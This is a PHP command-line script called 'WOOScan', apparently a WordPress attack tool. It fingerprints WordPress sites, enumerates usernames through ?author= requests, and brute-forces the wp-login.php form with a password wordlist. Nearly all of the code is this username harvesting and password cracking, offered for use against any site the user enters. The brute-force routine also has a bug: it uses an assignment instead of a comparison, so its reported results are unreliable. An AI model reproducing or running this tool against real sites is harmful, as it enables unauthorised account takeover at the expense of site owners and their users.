wps.php

<?php
/*
    Jayalah Negriku ~
    @Title : WOOScan V.0.1
    @About : Wordpress Tools
    @Code By : ZakirDotID
*/
error_reporting(0);
function check($url){
    $get = curls($url,null);
    preg_match("/name=\"generator\" content=\"WordPress (.*)\"/", $get , $result);
    $do = $result[0];
    if($do!=""){
        v("\t[ ".date("H:i:s")." ] $url ==> Wordpress\n ");
    } else {
        v("\t[ ".date("H:i:s")." ] $url ==> Not WordPress\n ");
    }
}
function curls($url,$data = null){
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36");
    if($data !=null) {
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $result = curl_exec($ch);
    return $result;
    curl_close($ch);
}
function v($x=""){
    echo $x;
}
function uc($url){
    v("\t[ ".date("H:i:s")." ] Check Username : ".$url."\n");
    for($id=1;$id<=10;$id++){
    $get = curls("$url?author=$id",null);
    preg_match("/<body class=\"archive author author-(.*?) author-$id/", $get, $login);
    $login = $login[1];
    if($login!=""){
    v("\t[ ".date("H:i:s")." ] ID ( $id ) | Username => $login \n");
    } else {
    v("\t[ ".date("H:i:s")." ] ID ( $id ) | Username Not Found!\n");
    }
  }
}
function bf($url,$username,$password){
    $get = curls($url."wp-login.php","&log=$username&pwd=$password");
    preg_match("/The password you entered for the username/", $get , $login);
    if($login[0]=""){
        v("\t[ ".date("H:i:s")." ] Cracking.... | Password => $password\n");
    } else {
        v("\t[ ".date("H:i:s")." ] Cracking.... | Not Matches => $password\n");
    }
}
function banner(){
    v("\n\t====================================================\n\tWOOScan Beta\n\t====================================================\n\tWordpress Tools Scan V.0.1 \n\tTools Running In Device [ ".OS()." ]\n\tCode By ZakirDotID\n\tUsage : -help\n\t====================================================\n");
}
function _rd(){
    return fopen('php://stdin', 'r');
}
function OS() {
    return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
}
if (OS()=="Windows") {
    exit("\n\tJust Tested In Linux!");
}
if (isset($argv[1])) {
    switch ($argv[1]) {
        case '-help':
        banner();
        break;
        case '-scan':
        banner();
        v("\n\tScanning Site Wordpress Beta | Example : http://www.site.com/path/\n\tInput Url : ");
        $url = _rd();
        $url = trim(fgets(_rd()));
        check($url);
        break;
        case '-usercheck':
        banner();
        v("\n\tScanning Username Wordpress Beta | Example : http://www.site.com/path/\n\tInput Url : ");
        $url = trim(fgets(_rd()));
        uc($url);
        break;
        case '-wpbf':
        banner();
        v("\n\tBrute Force Wordpress Beta | Example : http://www.site.com/path/ \n\tInput Url : ");
        $url = _rd();
        $url = trim(fgets($url));
        v("\tInput Username : ");
        $username = trim(fgets(_rd()));
        v("\tInput Wordist : ");
        $list = trim(fgets(_rd()));
        $paswd = file_get_contents($list) or exit("\n\tFile Not found!\n");
        $paswds = explode("\r\n", $paswd);
        v("\tPlease Wait....\n");
        sleep(1);
        foreach ($paswds as $password) {
            bf($url,$username,$password);
        }
        break;
        default:
        banner();
        break;
    }
} else {
    banner();
    v("\tError Command Not found!");
}